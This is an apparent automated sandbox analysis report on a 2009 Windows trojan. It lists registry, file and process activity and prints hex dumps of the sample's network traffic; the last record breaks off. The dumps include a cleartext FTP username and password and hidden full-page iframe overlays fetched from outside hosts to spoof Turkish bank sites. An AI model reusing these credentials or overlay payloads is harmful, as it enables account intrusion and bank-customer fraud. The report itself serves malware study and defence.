Analysis Report for 6e49d9550a4b1f30940373162457b888

Comment on this report

Summary:

Description	Risk
Changes security settings of Internet Explorer: This system alteration could seriously affect safety surfing the World Wide Web.
Creates files in the Windows system directory: Malware often keeps copies of itself in the Windows directory to stay undetected by users.
Performs File Modification and Destruction: The executable modifies and destructs files which are not temporary.
Spawns Processes: The executable produces processes during the execution.
Performs Registry Activities: The executable reads and modifies registry values. It may also create and monitor registry keys.

Table of Contents
expand all	collapse all
General information sample.exe C:\sample.exe Primary Analysis Subject General Information a) Registry Activities b) File Activities c) Windows Service Activities d) Process Activities e) Network Activities lsass.exe C:\WINDOWS\srchasst\lsass.exe Started by sample.exe General Information a) Registry Activities services.exe C:\WINDOWS\system32\services.exe NtConnectPort(\RPC Control\ntsvcs was called. General Information a) Registry Activities b) File Activities

1. General Information

	- Information about Anubis' invocation

Time needed:	243 s
Report created:	03/20/09, 11:02:01 UTC
Termination reason:	Timeout
Program version:	1.67.0

1.a) - Network Activity

	- FTP Conversations:

from ANUBIS:1094 to 66.147.237.199:21

User: microde@microdesignim.com (id ok)

Password: 2m1cr0d3s33s (logged in)

	- Unknown UDP Traffic:

from ANUBIS:1025 to 192.168.0.1:53

State: Normal establishment and termination - Transferred outbound Bytes: 33 - Transferred inbound Bytes: 112

from ANUBIS:1025 to 192.168.0.1:53

State: Normal establishment and termination - Transferred outbound Bytes: 33 - Transferred inbound Bytes: 108

	- Unknown TCP Traffic:

from ANUBIS:1067 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 743

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
6669 6e2e 7478 7420 4854 5450 2f31 2e31    fin.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 323a 3032    ar 2009 11:02:02
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 343a 3038    an 2009 04:14:08
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3034 662d 3139 382d 3436 3131 6539 6563    04f-198-4611e9ec
6432 3430 3022 0d0a 4163 6365 7074 2d52    d2400"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3430    ntent-Length: 40
380d 0a43 6f6e 7465 6e74 2d54 7970 653a    8..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
6669 6e61 6e73 6261 6e6b 2e63 6f6d 2e74    finansbank.com.t
722f 6465 6661 756c 742e 6173 7078 2220    r/default.aspx" 
0d0a 7769 6474 683d 3130 3025 0d0a 6865    ..width=100%..he
6967 6874 3d31 3030 2520 206d 6172 6769    ight=100%  margi
6e68 6569 6768 743d 2230 2220 6d61 7267    nheight="0" marg
696e 7769 6474 683d 2230 2220 2073 6372    inwidth="0"  scr
6f6c 6c69 6e67 3d22 6e6f 2220 0d0a 626f    olling="no" ..bo
7264 6572 3d22 3022 200d 0a66 7261 6d65    rder="0" ..frame
626f 7264 6572 3d22 3022 200d 0a74 6f70    border="0" ..top
3d22 3022 206c 6566 743d 2230 223e 0d0a    ="0" left="0">..
596f 7572 2062 726f 7773 6572 2064 6f65    Your browser doe
7320 6e6f 7420 7375 7070 6f72 7420 696e    s not support in
6c69 6e65 2066 7261 6d65 7320 6f72 2069    line frames or i
7320 6375 7272 656e 746c 7920 636f 6e66    s currently conf
6967 7572 6564 200d 0a6e 6f74 2074 6f20    igured ..not to 
6469 7370 6c61 7920 696e 6c69 6e65 2066    display inline f
7261 6d65 732e 0d0a 3c2f 4946 5241 4d45    rames...</IFRAME
3e3c 2f64 6976 3e                          ></div>

from ANUBIS:1068 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 632

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 666f    GET /img/jpg/yfo
722e 7478 7420 4854 5450 2f31 2e31 0d0a    r.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a32 3620 474d 540d 0a41 6363    4:23:26 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3832 3837 3138    s..ETag: "828718
3536 3132 3764 6339 313a 6164 3966 6322    56127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3032 3a30 3120 474d 540d    09 11:02:01 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7966 6f72 2e74 7874              /js/yfor.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 666f    GET /img/jpg/yfo
722e 7478 7420 4854 5450 2f31 2e31 0d0a    r.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a32 3620 474d 540d 0a41 6363    4:23:26 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3832 3837 3138    s..ETag: "828718
3536 3132 3764 6339 313a 6164 3966 6322    56127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3032 3a30 3220 474d 540d    09 11:02:02 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7966 6f72 2e74 7874              /js/yfor.txt

from ANUBIS:1069 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 736

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
666f 722e 7478 7420 4854 5450 2f31 2e31    for.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 323a 3033    ar 2009 11:02:03
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 343a 3138    an 2009 04:14:18
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3035 302d 3139 312d 3436 3131 6539 6636    050-191-4611e9f6
3562 6138 3022 0d0a 4163 6365 7074 2d52    5ba80"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3430    ntent-Length: 40
310d 0a43 6f6e 7465 6e74 2d54 7970 653a    1..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
666f 7274 6973 2e63 6f6d 2e74 722f 696e    fortis.com.tr/in
6465 782e 6a73 7022 200d 0a77 6964 7468    dex.jsp" ..width
3d31 3030 250d 0a68 6569 6768 743d 3130    =100%..height=10
3025 2020 6d61 7267 696e 6865 6967 6874    0%  marginheight
3d22 3022 206d 6172 6769 6e77 6964 7468    ="0" marginwidth
3d22 3022 2020 7363 726f 6c6c 696e 673d    ="0"  scrolling=
226e 6f22 200d 0a62 6f72 6465 723d 2230    "no" ..border="0
2220 0d0a 6672 616d 6562 6f72 6465 723d    " ..frameborder=
2230 2220 0d0a 746f 703d 2230 2220 6c65    "0" ..top="0" le
6674 3d22 3022 3e0d 0a59 6f75 7220 6272    ft="0">..Your br
6f77 7365 7220 646f 6573 206e 6f74 2073    owser does not s
7570 706f 7274 2069 6e6c 696e 6520 6672    upport inline fr
616d 6573 206f 7220 6973 2063 7572 7265    ames or is curre
6e74 6c79 2063 6f6e 6669 6775 7265 6420    ntly configured 
0d0a 6e6f 7420 746f 2064 6973 706c 6179    ..not to display
2069 6e6c 696e 6520 6672 616d 6573 2e0d     inline frames..
0a3c 2f49 4652 414d 453e 3c2f 6469 763e

from ANUBIS:1070 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 632

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 7961    GET /img/jpg/yya
702e 7478 7420 4854 5450 2f31 2e31 0d0a    p.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3234 3a34 3320 474d 540d 0a41 6363    4:24:43 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3963 3739 3463    s..ETag: "9c794c
3834 3132 3764 6339 313a 6164 3966 6322    84127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3032 3a30 3320 474d 540d    09 11:02:03 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7979 6170 2e74 7874              /js/yyap.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 7961    GET /img/jpg/yya
702e 7478 7420 4854 5450 2f31 2e31 0d0a    p.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3234 3a34 3320 474d 540d 0a41 6363    4:24:43 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3963 3739 3463    s..ETag: "9c794c
3834 3132 3764 6339 313a 6164 3966 6322    84127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3032 3a30 3320 474d 540d    09 11:02:03 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7979 6170 2e74 7874              /js/yyap.txt

from ANUBIS:1071 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 746

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
7961 702e 7478 7420 4854 5450 2f31 2e31    yap.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 323a 3035    ar 2009 11:02:05
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 363a 3437    an 2009 04:16:47
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3035 662d 3139 622d 3436 3131 6561 3834    05f-19b-4611ea84
3734 3963 3022 0d0a 4163 6365 7074 2d52    749c0"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3431    ntent-Length: 41
310d 0a43 6f6e 7465 6e74 2d54 7970 653a    1..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
7961 7069 6b72 6564 692e 636f 6d2f 7472    yapikredi.com/tr
2d54 522f 4d61 696e 5061 6765 2e61 7370    -TR/MainPage.asp
7822 200d 0a77 6964 7468 3d31 3030 250d    x" ..width=100%.
0a68 6569 6768 743d 3130 3025 2020 6d61    .height=100%  ma
7267 696e 6865 6967 6874 3d22 3022 206d    rginheight="0" m
6172 6769 6e77 6964 7468 3d22 3022 2020    arginwidth="0"  
7363 726f 6c6c 696e 673d 226e 6f22 200d    scrolling="no" .
0a62 6f72 6465 723d 2230 2220 0d0a 6672    .border="0" ..fr
616d 6562 6f72 6465 723d 2230 2220 0d0a    ameborder="0" ..
746f 703d 2230 2220 6c65 6674 3d22 3022    top="0" left="0"
3e0d 0a59 6f75 7220 6272 6f77 7365 7220    >..Your browser 
646f 6573 206e 6f74 2073 7570 706f 7274    does not support
2069 6e6c 696e 6520 6672 616d 6573 206f     inline frames o
7220 6973 2063 7572 7265 6e74 6c79 2063    r is currently c
6f6e 6669 6775 7265 6420 0d0a 6e6f 7420    onfigured ..not 
746f 2064 6973 706c 6179 2069 6e6c 696e    to display inlin
6520 6672 616d 6573 2e0d 0a3c 2f49 4652    e frames...</IFR
414d 453e 3c2f 6469 763e                   AME></div>

from ANUBIS:1072 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 632

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 7375    GET /img/jpg/ysu
702e 7478 7420 4854 5450 2f31 2e31 0d0a    p.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a35 3520 474d 540d 0a41 6363    4:23:55 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 6236 3538 3636    s..ETag: "b65866
3637 3132 3764 6339 313a 6164 3966 6322    67127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3032 3a30 3420 474d 540d    09 11:02:04 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7973 7570 2e74 7874              /js/ysup.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 7375    GET /img/jpg/ysu
702e 7478 7420 4854 5450 2f31 2e31 0d0a    p.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a35 3520 474d 540d 0a41 6363    4:23:55 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 6236 3538 3636    s..ETag: "b65866
3637 3132 3764 6339 313a 6164 3966 6322    67127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3032 3a30 3620 474d 540d    09 11:02:06 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7973 7570 2e74 7874              /js/ysup.txt

from ANUBIS:1073 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 743

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
7375 702e 7478 7420 4854 5450 2f31 2e31    sup.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
